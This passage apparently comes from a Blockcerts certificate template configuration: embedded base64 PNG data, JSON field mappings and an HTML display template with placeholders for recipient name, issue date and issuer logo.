BoaIiObC3u5Cn5jRMA
AcCrKAAGCgsL1ZGt/bBnv44AAJlEATBQaFiYjmztV27/A4DXUQAM5LQ7AMdPsDkLAHgbBcBATlsDcPI4BQAAvI0CYKCgoCAd2dqpuDM6AgBkEgXAQIGBzvrHHh8fryPAJ7Jly6YjwLWcdSWAVwQEOOsf+8X4BB0BPsHlHyZx1pUAmRYYGOS4ApCSkqojwCeyBVABYA5nXQmQaeERznoF0JKaSgGAf2TjHgAMQgEwTFi48wpASkqKjgCf4A4ATEIBMEy4w/YAsHAHAP7itAWyQGbwb7thIiIidGR7FAD4S3BwsI4A16IAGCbAgbc4L1++rCPAJ5y2R4bl8uVLOgKuCQXAMPEXnfdKXWBgoI4An3DiGgDukCGjKACGiY+/qCPbowAAf48CgIyiABjmogMLQBAFAH7g1F0AU9knAxlEATDMRQc+AggIogDA96z1MU4sASncAUAGUQAMk5qSIpcuOWvREHcA4A/ZsgU4sgDwCAAZRQEwUGqqswpAaKjz9i6A81gLAJ13+ecRADKOAmCgS5ec9YERERmuI8DrAqxv/468A+CsQg/7oAAYKDXFWR8Y0dHROgK8LlsAjwBgFgqAgRITE3Vka/ny5dYR4HXWNsBOKwDWol7OykBGUQAM5LQ3AfLmy6MjwOsCAwIdt1PmoYO/6gi4ZhQAAyU47Q5A/rw6ArzuP3cAnPWReOjQYR0B18xZ/7bDKxIuOqsAlCxdXEeA11k7TnIHACahABgoIcFZjwBKliwqAewFAB8LDAp03BqAX7kDgEygABgoLu6UjmwtICBAChbMp2PAq2JyxDiuAPzy6xEdAdeMAmCgI78e05HtxcYW0hHgVUWLFnZUAbCOyT7y61EdA9eMAmCgww780IgtQgGAbxUtUVRHtma9/5+Q4Kz1PLAXCoCBfv7pkI5sr2jxWB0BXlW8eBEd2Vpyckrar2QdA9eMAmCg3bt/0JHtlSlbSkeAV5UrV1pHtmZt6JWUmKRj4JpRAAz027nzcvKks6QDO1sAABSYSURBVBYClivvrA9nOEtQUJCUKOmsRwCJaRd/6xeQURQAQznt/eGYmOxSvGQxHQNeEZMju+dtEyf59eBhzgFApjjr33h4zS8OfH+4Vq2qOgK8ImfOHDqyvS+//EZHQLpQAAzlxDcBqtaoqCPAK3LmitGR7W3/+lsdAelCATCU0x4BWEqWLK4jwCtKlS6hI9vb/vVOHQHpQgEwlBMPESlarLCEhYfpGMi0atUq6cjWzp49JwkXL+oYSBcKgKEOHjjk2UnMSayV2nfd3UzHQKZVrnaDjmztVNxpHQHpRgEw1Lmzv8n+fT/r2Pbua9/KUdu1wv4KFy4ouXI5axHgkcPO284b9kMBMNgnH32hI9vLmze3REZG6BjIMKd9+7d8s+N7HQHpRgEw2Jdf7tCR7YWEhEjh2II6BjKsevXKOrK9Tz92XnmH/VAADObEk8Ss2//dunfWMZBh5a8vqyNbS0hIkO93Om87b9gPBcBgTn2OeEvtmpI7Ty4dA+lm7QBYwmE7TO7ZvZ8dAOEVFACDXbgQL7t37dWxI1Ss9C8dAenWpGl9CQoK1LGt7f7emX9mYT8UAMNtWL9VR47QvGUTHQHp1rR5Qx3Z3p49FAB4BwXAcJs2ve+4/QAst9W5UQoVLqBjIF2KFY/Vke3t/G6PjoAMoQAY7vSpM448UtQ6ua1lq6Y6Bq5Zoyb1JDo6Sse2duzIcflx3086BjKEAmC4+AvxjjwXwNKiZWPP7oBAelkF8rEnHtKx7a1bt1kuXXLeHTvYEwUA8ur8ZTpyhPwF8spdrbkLgPSzdv4rVCi/jm3vUwdu3gX7ogBA1q15RxIuJujYEdre11JHwFW1vb+VBAU76+6RtVbnxx8P6BjIMAoAPPY79IOlZKniUrpMKR0DfytHzhzy4MP36dj2rO1/OQQI3kQBgMe3O5x5tri1M+DEacMkMNBZ73Ij61gbSQUGOu+j7+W5C3UEZIrz/hTAJ9av
3awjxyhcuIBcV76MjoH/ERwcLJ06t9ex7SUmJMq2L77WMZApFAB4fPftLjno0LcBrBXdI8b0S/twd9YzXfhf85aNpViJIjq2vZNxpx35ui7sjQKAP23e8L6OHKN48SJS1YGnusF/sgVkk/vbt9axIyxa8IZcunRJx0CmUADwpy2bnVsALH0HdPfcDQCuxNo4qkQpZx38Y7HO7Fi65E0dA5nGpyX+tGvnD7J37486doyixWLlIQc+34V/dOrS3rNo1Gm+37lHUlM4/Q/eRwHAn6z3jJcsXKljR7m/Q2vJlTunjmG4Zwf0cOzZEatXvq0jwCsoAPgv2z7friNHyZEjRvoO7KFjGKxI0cLStp0zN4w6ffqsvLN+i44Br6AA4L9Y5wLs3b1fx45S5/ZbpEDBfDqGgaxb/sNG9dWxY6xbu1FSU7n9D9+gAOB/DB06wZFHBP8hKChQXlsyWyKjIvUIhqnf6DapVPl6HTvG1k0f6gjwGgoA/se+PT/KmdNndewo1qOAHr266hgGKRxbUPoP6qVjx9ize59849AdOuEMFAD8j5SUFFm6eJWOHcW69Xv3Pc2leq0qegRDPNOvu8TEROvYMWbPfJnb//ApCgCuaM7sV+XMmXM6dpxBQ3rzKMBAD3W5X269rZaOHSMhIVG+/GKHjgGvogDgyi5flk8/dv7Z47FFCkn/QT11DBeLzh4tXbo+oGPHsNbfTJ4w27MBEOBLFAD8rRlTX3T0YsA/NGpyuzzgwONfkX7Z0y7+6zYultDQED1yDOvCv3Y17/7D9ygA+FtHjxyT99/9RMeOY20P3PmR9lKseFE9gosEhwTL6PEDJSIiXI8c5YP3P/Oc/gf4GgUA/+iNZWt05EiRkRGyYNEsickRo0dwiW7dO8lNt9TQsaPEp337nzBmuo4Bn6AA4B999MFn8s12d7yKFBkVIZOnj5Dw8DA9gsO1aNlEOnRsq2PH2bLlIznrgsW3cAYKAK5q3Gj3fCOpXKWC9Hq2m47hYIViC8qAIc5f6Gkd9ztj8gs6BnyGAoCr+mHPfvn++x907FitWjeV3pQAVwgLC5NXF86S4OBgPXKcBfOXysmTp3QM+AwFAFdlfTN5pucQSU5K1iNHsjYJatvuLvn3g86/ZWyyvPnyyMq1r0rOnM5f15GYmCSLXl+hY8CnKAC4JkePHJft27/TsWNZ5wU80b2TtLirSVoj0FPYXZ48ueW52eMkX/48euRIz017UU4cP6ljwKcoALgm1n4A/Z8Z5dmhzC2s28ZDRzwjt9e7lRLgINZrftbrfqXLlNAjR0pKSpJ1azbqGPA5CgCu2am4U7Jl0/s6drxJU4fLnS3v0DFsauacCVKtRiUdO9aAZ0fJmTPOPnwLzkQBQLpMnvC8511lt+k/+Clp/wBrAuwsMChQ5i2YIRUr/UuPHOuXQ4fTSvUHOgb8ggKAdDl96ow8P3O+jh3PehzQvWdnebx7J88iQdhLVFSkPD9noqsu/snJyTKo3xgdA35DAUC6LV+yWvbt/UnHjhcUFCQPd75fho7sK+EO307WTaxV/hOnjfDc9ndTOXtn/Vb5Zoc7NtmCM1EAkG7WoqVB/Ua74qAgzbrANL+zocyaM15yuOD1MqcrUrSwvLRghtSoWVmPHM06anvC2Od0DPgVBQAZYm0OtHqle08sq1jpelmzfqGUKFVMj+An1WtWkeWrXpZixWL1yPEmT5gl5387r2PArygAyLAJY2fIyRNxOnaNiMhwefX1WdKlawc9gg+FhITI8DH9PHdhrMcybvPltm9kw/otOgb8jgKADLt4MUHGjpru2SnQrawS8MjjHWXClGGes+bhW1WrVZSXX5shzZo3lMDAQD12hWGDxktycoqOAb+jACBTtm7+QDa7/DWmgIAAqdegtixZ8ZLUrV+bTYN8ICo6Up7q/ajMfmmSlCtfRo9dwSrK06fOlV9/OaxHQJbIVrVCXfet5IJfRURFyKq3XpNcuXLokSttWL9VRg6b
JBdcuB+Cv2ULyCZlypaSOWkX/miX32Gx1s3c16aLjoEswx0AZFr8+XgZOnCcjl2rYZPbZd2mJVKpyg16hHQIDgn2PFp5fcls11/8z549J5079tAxkKUoAPCKjz74TObNXahjV7JeFbQ2pnnplaky//WZUrK0O/ak96cuXR+QdRsXS916t3oesbjd2FHTuGME2+ERALwmIjJCFi2bK7FFCuqRqyUmJsra1Rtl5rQXPd/0cGUBgQFyR9MG0uXRDp73+03xxrI1Mnr4FB0DWY4CAK+yNs9Z8/ZCz4ltprG+4U2Z+Lxnb/ezZygCf7BW81euUkE6de0gtW6sqseuduJEnNx3d2c5fZrDfmA/FAB4XYcH75XuPbsYcWv3SlJSUmXalDmyZuV6+c3gzV6Cg4Ok1HWlZPzEIVK4cAE9dj1r1f99d3eRffvct2023IECAJ8YMbqfNG3RUMfGsLZJTkpKlnVvbZJxI6d5Dn4xSZOm9aXfwB4SGRXpqv3706PfsyNlwzo2/IF9UQDgE9ZhOlNmjHLdHu4ZER9/Ub79ZpesXL5WNr7zrh67RqkyJeSBB9um/TOvKvkL5NVjo6xZ9Y5Rb8bAmSgA8JkCBfPJKwtnSZ48ufTIWMeOnpB31m+Rjz74XHbs+E6Sk5x9Z6BYiSJyy621pGGjOlKx8vV6bKQvt+2Qxzo/LampqXoE2AoFAD5VumxJWbRsjrHrAf7JuXO/ydvrtnp2U9y/7yeJO3lK/4jthIWHSYkSRaV6zcrSsnVTz+/x/6yC17F9Nzlx/KQeAbZDAYDP3V6vtoyfPEQCAykB/+TIkWOybvUm2bL5fTl65LjnrYKsXDtglTbrUU5kZLjceFN1aX5nY6lS7QbK3N+w/ll16viU7Px2lx4BtkQBgF8MG9U37QLSSMe4AmsBoXXQklUAjh897jk9btvn22X79m/lwnnfbSZjLdYrVbqEVK1eSWreWEXKlSuddvGP9OzvEBTkzoN5vOXypcvS44kB8tEHn+oRYFsUAPiF9a1x0PA+cmfLxnqEa2QVg3Nnf5Ozab+schBv/YqPl7i4055jma3SkJiY9J+/JiRJQmKiBAUGeG7bh4aGSljYf35lzx4l+fLnlejoKM/FPTLtl7WzYc5cMZ6jeJE+1ut+E8c/L0sXrvD8MwKcggIAvwkODpZR4wZI/Ya36RHgWK++vESmTX5Bx4Dt8TAPfmM9Ix0yYKxs//o7vinBFVa+sY6LPxyLAgC/sm5PP/nos55b1pQAONnWzR/JyKETdQw4BgUAfmdtjHNXsw5y+NejegQ4wnff7pb+z47QMeAoFABkiYSEROny4FPy048H9QiwtV3f75VHO/WWpMQkPQIchQKALHPs2Anp/nhf2bvnRz0CbMna5e/B9t3k4sWLegQ4DgUAWcp6DPDYI0/L3h/2syYAtvbu1o+la6dekpKSokeAI1EAkOVOnzojHdo9Jgd+PkQJgC29s36r9O4+0LPhD+AWFADYQnJyitzbupN89umXegRkqSUL35TB/UfrGHA8CgBsIyUlVXo+MVBWv/m2HgF+Z92Nmj9vsUwaP9Pz7ybgNuwECNux9qTv9Mi/5dFuD3p+D/ibtV/FjKlz0779r9QjwDUoALCtm2+tKWMnDvbsVQ/4y6lTZ2Rg39Hy2Sfb9AhwFQoAbC0yKlLefGuB5MqVQ48Ar0tKSpKWd/xbjh8/qUeA67AGALZ24fwFufvOjvLZp1/pEeBVX237RurXbs3FH8agAMD2rCNwez05UF6dv1SPgEyzjvN9Zd5izzv+1vHKgCl4BABHua3OTTJgaC/Jkye3HgHpdvTocRkzYqp8+P6negS4HgUAjhMaGirPvTBOKlepIAEB3MRC+lkb+uz5Yb883uVpOXvmnB4DRuDTE46TmPifg4QmjJ2pR8BVWe/3z5j+krS/5xEu/jAadwDgaEWLxcrMOROkUKH8egT8j0OHDkvPJwbITz8e0CPAONwBgKMdPPCL3N2io7z8
4iJJ5HhW/IOli1bJg/d34+IP/I47AHCNcuXLyFNPPyo1albRIxjKut2/e9deGTNqmuz8ZpceA0ajAMB1mjStL72ffVxy5szBVsIGO//beXntleUy94VX9QiAUADgUtkCssmQ4c9Ki5aN9AgG2LF9pzz5WF/PRlIArowCAFcr/6+yMmBobylfvowewYXOnv1N+vUZIds+/1pSUznBD/gnFAC4XlBQkNRtUFseefQBKVmqmB7DBU6fOuNZCLpyxVqJv3BRjwFcAQUARml7311yf4c2UqRIIT2CAyUmJMmqN9fJ7Ofmp337551+ID0oADCOtTCwy6MPSPu0IhAVHanHcIDk5GTZ/vVO6fF4P8/GUADSjwIAY4WHh0nHTu3loU7tJCgoUI9hU9u//k4G9Rsth389qkcA0oECAOPlyBEjtW6uJk907yyFChfQY9iA9Y1/6ZLVsmLpGjnw8yHP+/0AMocCAPwuJCRYbq5dS+5u01xuvLk6Bw3ZwPFjJ2X5stWydtUGOXb0uB4DyAQKAHAFFStdLw93uV8qVa4g2WOi9Rg+ZL2+99NPh+TttZtk0etvSEICz/gBX6AAAP/AeoWwRcsm0umR9pI7T04JCQnRPwIvsG7p/3buvGz7YrvMmDrXc8YDAN+iAADXwHpzIDwiXNq2u0seeewBCQ2lCHjLrl17ZeSwSbJ/70+SnJSsxwB8hAIApJN18S9Rqrg0aFRHWrRsLHny5NI/gqv48stvZOWytfJV2l95tg9kDQoAkAnWQkFru+FaN1WTGrWqSuUqFTyLCfHfjqZd5L/47Gv5/LOv5LNPvpS4k6f0jwDwMwoA4EUhoSFSv2EdadDwNilaLFYKFc4vYWFh+sdczXqef/rUWTl8+Kjs3Llb1q7aKN9/x1G8gN1QAABfyiZSuWpFadqsvtx4U3WJjo6SiMhwz+JCN7Au9omJSRJ/IV5OHI+T9eu3yIa0X9zWB+yPAgD4ifW4wFpIGBUVIZWr3CA1a1WTajUqSpGihfWP2lpKSop89+1u2fbFDvnkoy/k4IFDciGtACTyuh7gKBQAIIuFhoZKzpwxkit3TsmdJ5cUL1FEyl5XWgoXKSQFCuT1LDIMDPTfVsXWe/fHjp7wPLf/+ceDsveH/fLrr0ck7uRpOX36jJw5fVYuXbqk/zYADkMBAGzOunMQnT3aUxKsbYtz5sohuXLFSERkhGfBYVBwsIQE//HXIAlOy4LTfm+VhuS0b+vWq3VJyUmSkpT2+2TrV7LnV1JSkpw985vnon467aJ+xnNxPyfx8fH6/wQALkQBAADAQGx2DgCAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAA
gIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIH+D+ircANpodlQAAAAAElFTkSuQmCCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==",
"additional_global_fields": [
{"path": "$.displayHtml", "value": ""},
{
"path": "$.@context",
"value": [
"https://w3id.org/openbadges/v2",
"https://w3id.org/blockcerts/v2",
{"displayHtml": {"@id": "schema:description"}}
]
}
],
"additional_per_recipient_fields": [{"path": "$.displayHtml", "value": "*|FOO|*", "csv_column": "displayHtml"}],
"display_html": '<div class="sc-EHOje kcwAhk" style="font-family: Lato; text-align: left;"> <img src="%ISSUER_LOGO%" class="sc-jTzLTM gdVHeQ" style="max-width: 110px;" /><h2 class="sc-bZQynM hJaChX" style="font-size: 18.4px; font-weight: normal; font-style: italic; line-height: 1.76; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #2c2b3f; margin: 25px 0 0 0;" > %CERT_TITLE%</h2><p class="sc-gzVnrw gsQrMB" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; margin: 0;" > Issued to</p><h3 class="sc-htoDjs kQAJr" style="font-weight: normal; line-height: 1.38; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #d52c1e; margin: 0 0 10px 0; font-size: 46.4px; font-family: LucidaGrande; line-height: 0.7; -webkit-letter-spacing: -00.2px; -moz-letter-spacing: -00.2px; -ms-letter-spacing: -00.2px; letter-spacing: -00.2px; margin: 35px 0 40px 0; text-transform: uppercase;" > %RECIPIENT_NAME%</h3><div class="sc-dnqmqq bDsesi"><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0;" > Issue date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > %ISSUING_DATE%</div></div><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: 
#9595a0;" > Expiration date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > %EXPIRATION_DATE%</div></div> <img src="%ISSUER_SIGNATURE%" class="sc-fjdhpX hrCbRC" style="display: inline-block; max-width: 113px; max-height: 50px" /></div><p class="sc-VigVT kAqoHM" style="font-size: 14px; line-height: 1.36; color: #bababa; margin: 15px 0 27px 0;" > %CERT_DESCRIPTION%</p> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAhkAAABUCAYAAAAvQyUQAAAAAXNSR0IArs4c6QAALgtJREFUeAHtXQeYFEUTrTvJd4cKShCRDCaUJEhGBSSpJAUJKihBJKOSjBxgICOSFFAkSwYJEpUkKEmCgCBBRRQBuQNEJfz1eum52b2d3ZnducRf9X13MzvTU9Pztnf6dXVVdQTZkKtXr0bGx8dX4KL1IyIiSvPn23gff9E2LpcigoAgIAgIAoKAIJDGEOD+/iL397/x9jhXfW9kZOTCLFmyrMRxu48SEaggK8/E5KIzK+zB+zkClZVzgoAgIAgIAoKAIHDdI3CeOcFEfsrYmJiYk8Ge1pJkMLloxBcPY3KRN5gSOS8ICAKCgCAgCAgC/1cIxPPT9meiMYhJx1WrJ09EMphURJw7d64/b/tYXSTHBQFBQBAQBAQBQUAQYIIxNzo6+hnenveHhhfJuEYwpvO2ib/CckwQEAQEAUFAEBAEBAEzAkwwtjPRqMbbOPNx7EeaD1yzYAjBMIMi+4KAICAICAKCgCBgiQAbJkqyiwUMFF6cAhcYB+CDwQVkisQSRjkhCAgCgoAgIAgIAhYI1Dl//nx/33NquoTJRSa2YhzgrTh5+iIknwUBQUAQEAQEAUEgKAI8XfJf+vTp786UKdNBXVhZMhCmKgRDQyJbQUAQEAQEAUFAEHCKAPOI9P/9998A83URfDCSrRi/8VbyYJiRkX1BQBAQBAQBQUAQcIQAWzOupkuXrmDmzJmP4EKVyVMIhiMMpbAgIAgIAoKAICAI+EGA+UTE5cuXn9CnMF1SX3+QrSAgCAgCgoAgIAgIAuEgwETD4BWRbNooHY4yuVYQEAQEAUFAEBAEBAGNAJMMg1dE8gcsdCYiCAgCgoAgIAgIAoKAGwjEMLdQC6hiukRIhhuQig5BQBAQBAQBQUAQUAj8888/iluAZMhy7dIoBAFBQBAQBAQBQcA1BNj5MwbKVJ4M17SKIkFAEBAEBAFBQBAQBK4hICRDmoIgIAgIAoKAICAIJAkCQjKSBFZRKggIAoKAICAICAJpnmRs2rSVmjRpR/WfaEXLlq2Rb1QQEAQEAUFAEBAEUgkCEXFxcVdTSV0cVePw4WM0fNhHtG/fQeK06BQRGUlZMmeiPHlyU/ce7al48Tsd6ZPCgoAgIAgIAoKAIOAOAjfccEOZqKiorWmOZPz1Vxx9NH4KrVq9nuLPnqPomCgqWqwg5cqVg9Z9/